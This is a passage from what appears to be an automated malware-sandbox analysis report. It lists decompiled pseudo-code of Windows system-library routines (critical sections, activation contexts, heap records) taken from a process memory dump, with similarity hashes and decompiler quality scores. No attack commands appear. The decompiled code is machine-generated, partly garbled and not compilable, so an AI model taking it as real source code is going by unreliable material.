                        				_t62 = _v88;
                        				_t65 = _t44;
                        				if(_t62 != 0) {
                        					asm("lock xadd [edi], eax");
                        					if((_t44 | 0xffffffff) != 0) {
                        						goto L4;
                        					}
                        					_push( *((intOrPtr*)(_t62 + 4)));
                        					E02B395D0();
                        					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                        					goto L4;
                        				} else {
                        					L4:
                        					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                        					if(_t65 >= 0) {
                        						_t52 = 1;
                        					} else {
                        						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                        							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                        						}
                        					}
                        					_t35 = _t52;
                        					goto L8;
                        				}
                        			}


































                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: fc92c78f54405f855a0fc130d1d4c6881c231a11a4605e8f2e60d570fe1e5bb6
                        • Instruction ID: 8b7071a8f92d6cd8f87028beacccb318ddf354ed2ef3059d7675509171b7a54c
                        • Opcode Fuzzy Hash: fc92c78f54405f855a0fc130d1d4c6881c231a11a4605e8f2e60d570fe1e5bb6
                        • Instruction Fuzzy Hash: 9931B3B25083169FC711DF28C980A6BBBE9FB85754F0049AEF998D3210D734DD08CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E02B01B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                        				intOrPtr _v8;
                        				char _v16;
                        				intOrPtr* _t26;
                        				intOrPtr _t29;
                        				void* _t30;
                        				signed int _t31;
                        
                        				_t27 = __ecx;
                        				_t29 = __edx;
                        				_t31 = 0;
                        				_v8 = __edx;
                        				if(__edx == 0) {
                        					L18:
                        					_t30 = 0xc000000d;
                        					goto L12;
                        				} else {
                        					_t26 = _a4;
                        					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                        						goto L18;
                        					} else {
                        						E02B3BB40(__ecx,  &_v16, __ecx);
                        						_push(_t26);
                        						_push(0);
                        						_push(0);
                        						_push(_t29);
                        						_push( &_v16);
                        						_t30 = E02B3A9B0();
                        						if(_t30 >= 0) {
                        							_t19 =  *_t26;
                        							if( *_t26 != 0) {
                        								goto L7;
                        							} else {
                        								 *_a8 =  *_a8 & 0;
                        							}
                        						} else {
                        							if(_t30 != 0xc0000023) {
                        								L9:
                        								_push(_t26);
                        								_push( *_t26);
                        								_push(_t31);
                        								_push(_v8);
                        								_push( &_v16);
                        								_t30 = E02B3A9B0();
                        								if(_t30 < 0) {
                        									L12:
                        									if(_t31 != 0) {
                        										L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                        									}
                        								} else {
                        									 *_a8 = _t31;
                        								}
                        							} else {
                        								_t19 =  *_t26;
                        								if( *_t26 == 0) {
                        									_t31 = 0;
                        								} else {
                        									L7:
                        									_t31 = L02B14620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                        								}
                        								if(_t31 == 0) {
                        									_t30 = 0xc0000017;
                        								} else {
                        									goto L9;
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t30;
                        			}










                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: WindowsExcludedProcs
                        • API String ID: 0-3583428290
                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction ID: 398e091658e104f5f77a5832d7d280019432dc547d0e3bc62b099cc9b30e9db3
                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction Fuzzy Hash: 46219576611228ABDB379A5D8880F5BBBADEF41754F1A44E5FD089F240DB30DD00EBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B1F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                        				intOrPtr _t13;
                        				intOrPtr _t14;
                        				signed int _t16;
                        				signed char _t17;
                        				intOrPtr _t19;
                        				intOrPtr _t21;
                        				intOrPtr _t23;
                        				intOrPtr* _t25;
                        
                        				_t25 = _a8;
                        				_t17 = __ecx;
                        				if(_t25 == 0) {
                        					_t19 = 0xc00000f2;
                        					L8:
                        					return _t19;
                        				}
                        				if((__ecx & 0xfffffffe) != 0) {
                        					_t19 = 0xc00000ef;
                        					goto L8;
                        				}
                        				_t19 = 0;
                        				 *_t25 = 0;
                        				_t21 = 0;
                        				_t23 = "Actx ";
                        				if(__edx != 0) {
                        					if(__edx == 0xfffffffc) {
                        						L21:
                        						_t21 = 0x200;
                        						L5:
                        						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                        						 *_t25 = _t13;
                        						L6:
                        						if(_t13 == 0) {
                        							if((_t17 & 0x00000001) != 0) {
                        								 *_t25 = _t23;
                        							}
                        						}
                        						L7:
                        						goto L8;
                        					}
                        					if(__edx == 0xfffffffd) {
                        						 *_t25 = _t23;
                        						_t13 = _t23;
                        						goto L6;
                        					}
                        					_t13 =  *((intOrPtr*)(__edx + 0x10));
                        					 *_t25 = _t13;
                        					L14:
                        					if(_t21 == 0) {
                        						goto L6;
                        					}
                        					goto L5;
                        				}
                        				_t14 = _a4;
                        				if(_t14 != 0) {
                        					_t16 =  *(_t14 + 0x14) & 0x00000007;
                        					if(_t16 <= 1) {
                        						_t21 = 0x1f8;
                        						_t13 = 0;
                        						goto L14;
                        					}
                        					if(_t16 == 2) {
                        						goto L21;
                        					}
                        					if(_t16 != 4) {
                        						_t19 = 0xc00000f0;
                        						goto L7;
                        					}
                        					_t13 = 0;
                        					goto L6;
                        				} else {
                        					_t21 = 0x1f8;
                        					goto L5;
                        				}
                        			}












                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: Actx
                        • API String ID: 0-89312691
                        • Opcode ID: ccb06221fb500c965c7147b8965684a8123793b44d49aca52837b566f28cf3da
                        • Instruction ID: b196d8174bfba966fc41c4c253b354d237de19cfed3e052329f26fba0904f0c0
                        • Opcode Fuzzy Hash: ccb06221fb500c965c7147b8965684a8123793b44d49aca52837b566f28cf3da
                        • Instruction Fuzzy Hash: 1C11C1397047028BEB344E1D889073672A6EF96668FA845BAE476CBBA1DB74C841C340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 71%
                        			E02BA8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t35;
                        				void* _t41;
                        
                        				_t40 = __esi;
                        				_t39 = __edi;
                        				_t38 = __edx;
                        				_t35 = __ecx;
                        				_t34 = __ebx;
                        				_push(0x74);
                        				_push(0x2bd0d50);
                        				E02B4D0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                        				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                        				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                        					E02B85720(0x65, 0, "Critical error detected %lx\n", _t35);
                        					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                        						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                        						asm("int3");
                        						 *(_t41 - 4) = 0xfffffffe;
                        					}
                        				}
                        				 *(_t41 - 4) = 1;
                        				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                        				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                        				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                        				 *((intOrPtr*)(_t41 - 0x64)) = L02B4DEF0;
                        				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                        				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                        				_push(_t41 - 0x70);
                        				L02B4DEF0(1, _t38);
                        				 *(_t41 - 4) = 0xfffffffe;
                        				return E02B4D130(_t34, _t39, _t40);
                        			}






                        Strings
                        • Critical error detected %lx, xrefs: 02BA8E21
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: Critical error detected %lx
                        • API String ID: 0-802127002
                        • Opcode ID: ce6d8d750bac25b48a23024d573fee8b1de27121bdc0b22149ca6749aeed866b
                        • Instruction ID: 953d3ec9532de6bb3ac88488f48cef3ee6044de02671656e43749f37034cd7d7
                        • Opcode Fuzzy Hash: ce6d8d750bac25b48a23024d573fee8b1de27121bdc0b22149ca6749aeed866b
                        • Instruction Fuzzy Hash: AD118771E48348EBEF24DFA885057DCBBB1FB04314F20829EE529AB292D7310602CF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 02B8FF60
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                        • API String ID: 0-1911121157
                        • Opcode ID: f17827574cccfd55271bbdbab515b7eb9091286e4b9e36db45a6bb0eabe55e2a
                        • Instruction ID: 61172473ecf7a01e99f80684f1cd185b36b9cd301fc9fe0741f2880f265b4e9c
                        • Opcode Fuzzy Hash: f17827574cccfd55271bbdbab515b7eb9091286e4b9e36db45a6bb0eabe55e2a
                        • Instruction Fuzzy Hash: 2911C471A51244EFEF21EB50C988FACB7B2FF08718F5484D4F5095B661CB399950DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E02BC5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed int _t296;
                        				signed char _t298;
                        				signed int _t301;
                        				signed int _t306;
                        				signed int _t310;
                        				signed char _t311;
                        				intOrPtr _t312;
                        				signed int _t313;
                        				void* _t327;
                        				signed int _t328;
                        				intOrPtr _t329;
                        				intOrPtr _t333;
                        				signed char _t334;
                        				signed int _t336;
                        				void* _t339;
                        				signed int _t340;
                        				signed int _t356;
                        				signed int _t362;
                        				short _t367;
                        				short _t368;
                        				short _t373;
                        				signed int _t380;
                        				void* _t382;
                        				short _t385;
                        				signed short _t392;
                        				signed char _t393;
                        				signed int _t395;
                        				signed char _t397;
                        				signed int _t398;
                        				signed short _t402;
                        				void* _t406;
                        				signed int _t412;
                        				signed char _t414;
                        				signed short _t416;
                        				signed int _t421;
                        				signed char _t427;
                        				intOrPtr _t434;
                        				signed char _t435;
                        				signed int _t436;
                        				signed int _t442;
                        				signed int _t446;
                        				signed int _t447;
                        				signed int _t451;
                        				signed int _t453;
                        				signed int _t454;
                        				signed int _t455;
                        				intOrPtr _t456;
                        				intOrPtr* _t457;
                        				short _t458;
                        				signed short _t462;
                        				signed int _t469;
                        				intOrPtr* _t474;
                        				signed int _t475;
                        				signed int _t479;
                        				signed int _t480;
                        				signed int _t481;
                        				short _t485;
                        				signed int _t491;
                        				signed int* _t494;
                        				signed int _t498;
                        				signed int _t505;
                        				intOrPtr _t506;
                        				signed short _t508;
                        				signed int _t511;
                        				void* _t517;
                        				signed int _t519;
                        				signed int _t522;
                        				void* _t523;
                        				signed int _t524;
                        				void* _t528;
                        				signed int _t529;
                        
                        				_push(0xd4);
                        				_push(0x2bd1178);
                        				E02B4D0E8(__ebx, __edi, __esi);
                        				_t494 = __edx;
                        				 *(_t528 - 0xcc) = __edx;
                        				_t511 = __ecx;
                        				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                        				 *(_t528 - 0xbc) = __ecx;
                        				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                        				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                        				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                        				_t427 = 0;
                        				 *(_t528 - 0x74) = 0;
                        				 *(_t528 - 0x9c) = 0;
                        				 *(_t528 - 0x84) = 0;
                        				 *(_t528 - 0xac) = 0;
                        				 *(_t528 - 0x88) = 0;
                        				 *(_t528 - 0xa8) = 0;
                        				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                        				if( *(_t528 + 0x1c) <= 0x80) {
                        					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                        					if(__eflags != 0) {
                        						_t421 = E02BC4C56(0, __edx, __ecx, __eflags);
                        						__eflags = _t421;
                        						if(_t421 != 0) {
                        							 *((intOrPtr*)(_t528 - 4)) = 0;
                        							E02B3D000(0x410);
                        							 *(_t528 - 0x18) = _t529;
                        							 *(_t528 - 0x9c) = _t529;
                        							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                        							E02BC5542(_t528 - 0x9c, _t528 - 0x84);
                        						}
                        					}
                        					_t435 = _t427;
                        					 *(_t528 - 0xd0) = _t435;
                        					_t474 = _t511 + 0x65;
                        					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                        					_t511 = 0x18;
                        					while(1) {
                        						 *(_t528 - 0xa0) = _t427;
                        						 *(_t528 - 0xbc) = _t427;
                        						 *(_t528 - 0x80) = _t427;
                        						 *(_t528 - 0x78) = 0x50;
                        						 *(_t528 - 0x79) = _t427;
                        						 *(_t528 - 0x7a) = _t427;
                        						 *(_t528 - 0x8c) = _t427;
                        						 *(_t528 - 0x98) = _t427;
                        						 *(_t528 - 0x90) = _t427;
                        						 *(_t528 - 0xb0) = _t427;
                        						 *(_t528 - 0xb8) = _t427;
                        						_t296 = 1 << _t435;
                        						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                        						__eflags = _t436 & _t296;
                        						if((_t436 & _t296) != 0) {
                        							goto L92;
                        						}
                        						__eflags =  *((char*)(_t474 - 1));
                        						if( *((char*)(_t474 - 1)) == 0) {
                        							goto L92;
                        						}
                        						_t301 =  *_t474;
                        						__eflags = _t494[1] - _t301;
                        						if(_t494[1] <= _t301) {
                        							L10:
                        							__eflags =  *(_t474 - 5) & 0x00000040;
                        							if(( *(_t474 - 5) & 0x00000040) == 0) {
                        								L12:
                        								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                        								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                        									goto L92;
                        								}
                        								_t442 =  *(_t474 - 0x11) & _t494[3];
                        								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                        								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                        									goto L92;
                        								}
                        								__eflags = _t442 -  *(_t474 - 0x11);
                        								if(_t442 !=  *(_t474 - 0x11)) {
                        									goto L92;
                        								}
                        								L15:
                        								_t306 =  *(_t474 + 1) & 0x000000ff;
                        								 *(_t528 - 0xc0) = _t306;
                        								 *(_t528 - 0xa4) = _t306;
                        								__eflags =  *0x2be60e8;
                        								if( *0x2be60e8 != 0) {
                        									__eflags = _t306 - 0x40;
                        									if(_t306 < 0x40) {
                        										L20:
                        										asm("lock inc dword [eax]");
                        										_t310 =  *0x2be60e8; // 0x0
                        										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                        										__eflags = _t311 & 0x00000001;
                        										if((_t311 & 0x00000001) == 0) {
                        											 *(_t528 - 0xa0) = _t311;
                        											_t475 = _t427;
                        											 *(_t528 - 0x74) = _t427;
                        											__eflags = _t475;
                        											if(_t475 != 0) {
                        												L91:
                        												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                        												goto L92;
                        											}
                        											asm("sbb edi, edi");
                        											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                        											_t511 = _t498;
                        											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                        											__eflags =  *(_t312 - 5) & 1;
                        											if(( *(_t312 - 5) & 1) != 0) {
                        												_push(_t528 - 0x98);
                        												_push(0x4c);
                        												_push(_t528 - 0x70);
                        												_push(1);
                        												_push(0xfffffffa);
                        												_t412 = E02B39710();
                        												_t475 = _t427;
                        												__eflags = _t412;
                        												if(_t412 >= 0) {
                        													_t414 =  *(_t528 - 0x98) - 8;
                        													 *(_t528 - 0x98) = _t414;
                        													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                        													 *(_t528 - 0x8c) = _t416;
                        													 *(_t528 - 0x79) = 1;
                        													_t511 = (_t416 & 0x0000ffff) + _t498;
                        													__eflags = _t511;
                        												}
                        											}
                        											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                        											__eflags = _t446 & 0x00000004;
                        											if((_t446 & 0x00000004) != 0) {
                        												__eflags =  *(_t528 - 0x9c);
                        												if( *(_t528 - 0x9c) != 0) {
                        													 *(_t528 - 0x7a) = 1;
                        													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                        													__eflags = _t511;
                        												}
                        											}
                        											_t313 = 2;
                        											_t447 = _t446 & _t313;
                        											__eflags = _t447;
                        											 *(_t528 - 0xd4) = _t447;
                        											if(_t447 != 0) {
                        												_t406 = 0x10;
                        												_t511 = _t511 + _t406;
                        												__eflags = _t511;
                        											}
                        											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                        											 *(_t528 - 0x88) = _t427;
                        											__eflags =  *(_t528 + 0x1c);
                        											if( *(_t528 + 0x1c) <= 0) {
                        												L45:
                        												__eflags =  *(_t528 - 0xb0);
                        												if( *(_t528 - 0xb0) != 0) {
                        													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                        													__eflags = _t511;
                        												}
                        												__eflags = _t475;
                        												if(_t475 != 0) {
                        													asm("lock dec dword [ecx+edx*8+0x4]");
                        													goto L100;
                        												} else {
                        													_t494[3] = _t511;
                        													_t451 =  *(_t528 - 0xa0);
                        													_t427 = E02B36DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                        													 *(_t528 - 0x88) = _t427;
                        													__eflags = _t427;
                        													if(_t427 == 0) {
                        														__eflags = _t511 - 0xfff8;
                        														if(_t511 <= 0xfff8) {
                        															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                        															asm("sbb ecx, ecx");
                        															__eflags = (_t451 & 0x000000e2) + 8;
                        														}
                        														asm("lock dec dword [eax+edx*8+0x4]");
                        														L100:
                        														goto L101;
                        													}
                        													_t453 =  *(_t528 - 0xa0);
                        													 *_t494 = _t453;
                        													_t494[1] = _t427;
                        													_t494[2] =  *(_t528 - 0xbc);
                        													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                        													 *_t427 =  *(_t453 + 0x24) | _t511;
                        													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                        													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													__eflags =  *(_t528 + 0x14);
                        													if( *(_t528 + 0x14) == 0) {
                        														__eflags =  *[fs:0x18] + 0xf50;
                        													}
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													__eflags =  *(_t528 + 0x18);
                        													if( *(_t528 + 0x18) == 0) {
                        														_t454 =  *(_t528 - 0x80);
                        														_t479 =  *(_t528 - 0x78);
                        														_t327 = 1;
                        														__eflags = 1;
                        													} else {
                        														_t146 = _t427 + 0x50; // 0x50
                        														_t454 = _t146;
                        														 *(_t528 - 0x80) = _t454;
                        														_t382 = 0x18;
                        														 *_t454 = _t382;
                        														 *((short*)(_t454 + 2)) = 1;
                        														_t385 = 0x10;
                        														 *((short*)(_t454 + 6)) = _t385;
                        														 *(_t454 + 4) = 0;
                        														asm("movsd");
                        														asm("movsd");
                        														asm("movsd");
                        														asm("movsd");
                        														_t327 = 1;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 = 0x68;
                        														 *(_t528 - 0x78) = _t479;
                        													}
                        													__eflags =  *(_t528 - 0x79) - _t327;
                        													if( *(_t528 - 0x79) == _t327) {
                        														_t524 = _t479 + _t427;
                        														_t508 =  *(_t528 - 0x8c);
                        														 *_t524 = _t508;
                        														_t373 = 2;
                        														 *((short*)(_t524 + 2)) = _t373;
                        														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                        														 *((short*)(_t524 + 4)) = 0;
                        														_t167 = _t524 + 8; // 0x8
                        														E02B3F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                        														_t529 = _t529 + 0xc;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                        														 *(_t528 - 0x78) = _t479;
                        														_t380 =  *(_t528 - 0x80);
                        														__eflags = _t380;
                        														if(_t380 != 0) {
                        															_t173 = _t380 + 4;
                        															 *_t173 =  *(_t380 + 4) | 1;
                        															__eflags =  *_t173;
                        														}
                        														_t454 = _t524;
                        														 *(_t528 - 0x80) = _t454;
                        														_t327 = 1;
                        														__eflags = 1;
                        													}
                        													__eflags =  *(_t528 - 0xd4);
                        													if( *(_t528 - 0xd4) == 0) {
                        														_t505 =  *(_t528 - 0x80);
                        													} else {
                        														_t505 = _t479 + _t427;
                        														_t523 = 0x10;
                        														 *_t505 = _t523;
                        														_t367 = 3;
                        														 *((short*)(_t505 + 2)) = _t367;
                        														_t368 = 4;
                        														 *((short*)(_t505 + 6)) = _t368;
                        														 *(_t505 + 4) = 0;
                        														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                        														_t327 = 1;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 = _t479 + _t523;
                        														 *(_t528 - 0x78) = _t479;
                        														__eflags = _t454;
                        														if(_t454 != 0) {
                        															_t186 = _t454 + 4;
                        															 *_t186 =  *(_t454 + 4) | 1;
                        															__eflags =  *_t186;
                        														}
                        														 *(_t528 - 0x80) = _t505;
                        													}
                        													__eflags =  *(_t528 - 0x7a) - _t327;
                        													if( *(_t528 - 0x7a) == _t327) {
                        														 *(_t528 - 0xd4) = _t479 + _t427;
                        														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                        														E02B3F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                        														_t529 = _t529 + 0xc;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 =  *(_t528 - 0x78) + _t522;
                        														 *(_t528 - 0x78) = _t479;
                        														__eflags = _t505;
                        														if(_t505 != 0) {
                        															_t199 = _t505 + 4;
                        															 *_t199 =  *(_t505 + 4) | 1;
                        															__eflags =  *_t199;
                        														}
                        														_t505 =  *(_t528 - 0xd4);
                        														 *(_t528 - 0x80) = _t505;
                        													}
                        													__eflags =  *(_t528 - 0xa8);
                        													if( *(_t528 - 0xa8) != 0) {
                        														_t356 = _t479 + _t427;
                        														 *(_t528 - 0xd4) = _t356;
                        														_t462 =  *(_t528 - 0xac);
                        														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                        														_t485 = 0xc;
                        														 *((short*)(_t356 + 2)) = _t485;
                        														 *(_t356 + 6) = _t462;
                        														 *((short*)(_t356 + 4)) = 0;
                        														_t211 = _t356 + 8; // 0x9
                        														E02B3F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                        														E02B3FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                        														_t529 = _t529 + 0x18;
                        														_t427 =  *(_t528 - 0x88);
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t505 =  *(_t528 - 0xd4);
                        														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                        														 *(_t528 - 0x78) = _t479;
                        														_t362 =  *(_t528 - 0x80);
                        														__eflags = _t362;
                        														if(_t362 != 0) {
                        															_t222 = _t362 + 4;
                        															 *_t222 =  *(_t362 + 4) | 1;
                        															__eflags =  *_t222;
                        														}
                        													}
                        													__eflags =  *(_t528 - 0xb0);
                        													if( *(_t528 - 0xb0) != 0) {
                        														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                        														_t458 = 0xb;
                        														 *((short*)(_t479 + _t427 + 2)) = _t458;
                        														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                        														 *((short*)(_t427 + 4 + _t479)) = 0;
                        														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                        														E02B3FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                        														_t529 = _t529 + 0xc;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                        														 *(_t528 - 0x78) = _t479;
                        														__eflags = _t505;
                        														if(_t505 != 0) {
                        															_t241 = _t505 + 4;
                        															 *_t241 =  *(_t505 + 4) | 1;
                        															__eflags =  *_t241;
                        														}
                        													}
                        													_t328 =  *(_t528 + 0x1c);
                        													__eflags = _t328;
                        													if(_t328 == 0) {
                        														L87:
                        														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                        														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                        														_t455 =  *(_t528 - 0xdc);
                        														 *(_t427 + 0x14) = _t455;
                        														_t480 =  *(_t528 - 0xa0);
                        														_t517 = 3;
                        														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                        														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                        															asm("rdtsc");
                        															 *(_t427 + 0x3c) = _t480;
                        														} else {
                        															 *(_t427 + 0x3c) = _t455;
                        														}
                        														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                        														_t456 =  *[fs:0x18];
                        														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                        														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                        														_t427 = 0;
                        														__eflags = 0;
                        														_t511 = 0x18;
                        														goto L91;
                        													} else {
                        														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                        														__eflags = _t519;
                        														 *(_t528 - 0x8c) = _t328;
                        														do {
                        															_t506 =  *((intOrPtr*)(_t519 - 4));
                        															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                        															 *(_t528 - 0xd4) =  *(_t519 - 8);
                        															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                        															__eflags =  *(_t333 + 0x36) & 0x00004000;
                        															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                        																_t334 =  *_t519;
                        															} else {
                        																_t334 = 0;
                        															}
                        															_t336 = _t334 & 0x000000ff;
                        															__eflags = _t336;
                        															_t427 =  *(_t528 - 0x88);
                        															if(_t336 == 0) {
                        																_t481 = _t479 + _t506;
                        																__eflags = _t481;
                        																 *(_t528 - 0x78) = _t481;
                        																E02B3F3E0(_t479 + _t427, _t457, _t506);
                        																_t529 = _t529 + 0xc;
                        															} else {
                        																_t340 = _t336 - 1;
                        																__eflags = _t340;
                        																if(_t340 == 0) {
                        																	E02B3F3E0( *(_t528 - 0xb8), _t457, _t506);
                        																	_t529 = _t529 + 0xc;
                        																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                        																} else {
                        																	__eflags = _t340 == 0;
                        																	if(_t340 == 0) {
                        																		__eflags = _t506 - 8;
                        																		if(_t506 == 8) {
                        																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                        																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                        																		}
                        																	}
                        																}
                        															}
                        															_t339 = 0x10;
                        															_t519 = _t519 + _t339;
